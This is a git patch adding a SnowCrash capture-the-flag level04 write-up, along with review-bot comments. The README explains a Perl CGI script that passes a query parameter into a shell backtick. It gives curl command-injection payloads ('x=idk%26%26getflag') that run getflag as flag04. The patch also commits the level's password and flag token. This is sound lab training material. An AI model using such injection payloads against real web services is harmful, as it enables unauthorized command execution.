From ff90b625c518151d278e347d445c9fdf72496ff0 Mon Sep 17 00:00:00 2001 From: Maieul BOYER Date: Mon, 19 Jan 2026 16:27:08 +0100 Subject: [PATCH] level04 --- levels/04/README.md | 96 +++++++++++++++++++++++++++++++++++++++++++++ levels/04/flag | 1 + levels/04/passwd | 1 + 3 files changed, 98 insertions(+) create mode 100644 levels/04/README.md create mode 100644 levels/04/flag create mode 100644 levels/04/passwd diff --git a/levels/04/README.md b/levels/04/README.md new file mode 100644 index 0000000..22e4750 --- /dev/null +++ b/levels/04/README.md 
@@ -0,0 +1,96 @@ +# Level 04 + +## how to login + +username: level04 + +password: qi0maab88jeaj46qoumi7maus + +## Goal + +run `getflag` as user `flag04` + +## Actually doing something + +```bash +level04@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl* +-r-x------ 1 level04 level04 675 Apr 3 2012 .profile* +``` + +Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl + +```perl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; +} +x(param("x")); +``` + +This reeks of exploit + +As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it + +The issue is how it returns it... + +It forward it to a shell string, and print the result. +This is as secure as having a litteral endpoint that takes a command and return the result. + +Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo` +command we can run whatever we want + +for example `getflag` + +we want this +```perl + print `echo $y 2>&1` +``` +to become +```perl + print `echo idk && getflag 2>&1` +``` + +We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag` + +but if we do it dumbly, nothing happens + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag' +idk +``` + +Why ? + +Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it. + +How ? + +The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&` + +lets replace it to get `idk%26%26getflag` and voila ! 
+ +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag' +GetExploited +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo' +idk +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +Look mom, I recycle my stuff ! diff --git a/levels/04/flag b/levels/04/flag new file mode 100644 index 0000000..920bae8 --- /dev/null +++ b/levels/04/flag @@ -0,0 +1 @@ +ne2searoevaevoem4ov4ar8ap diff --git a/levels/04/passwd b/levels/04/passwd new file mode 100644 index 0000000..f5e998e --- /dev/null +++ b/levels/04/passwd @@ -0,0 +1 @@ +qi0maab88jeaj46qoumi7maus
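Review bot: in the `levels/04/README.md` hunk the write-up explains the bug as missing sanitization but never states the fix, which is the lesson a reader should take from `print `echo $y 2>&1`;`: interpolating an untrusted CGI parameter into a backtick string hands it to `/bin/sh`, so the remedy is to keep the shell out of the path (the list form of `system`/`exec`, or running under Perl taint mode with `-T` and an explicit allow-list check on `$y`), not to escape metacharacters one at a time. The README also leaves two things unstated: why the injected command runs as `flag04` (the listing shows `-rwsr-sr-x 1 flag04 level04 ... level04.pl*`, but the text only says the script is "used by the http server at localhost:4747", so say which of the two is the reason), and what `/tmp/path/echo` contains in the last example (one line saying it is a script the author wrote that calls `getflag` would make the "recycle" remark clear). Minor wording: "litteral" should be "literal", "separetes" should be "separates", and "It forward it to a shell string, and print the result" should read "It forwards it to a shell string and prints the result".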
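Review bot: the `levels/04/flag` hunk commits the token `ne2searoevaevoem4ov4ar8ap` as a bare one-line file, although the same value is already captured in the README's `curl` output; this duplicates the secret and is one more file a secret-scanning hook will report. Suggest either dropping the file or stating in the README why a separate copy is kept.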
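Review bot: the `levels/04/passwd` hunk stores the level login password `qi0maab88jeaj46qoumi7maus` in plaintext with the default `100644` mode and no explanation of its purpose, and the README's "how to login" section already carries the same value. If the file exists for tooling, say so in the README; otherwise it is redundant and is better left out of the history (a `levels/*/passwd` entry in `.gitignore` would keep future levels consistent).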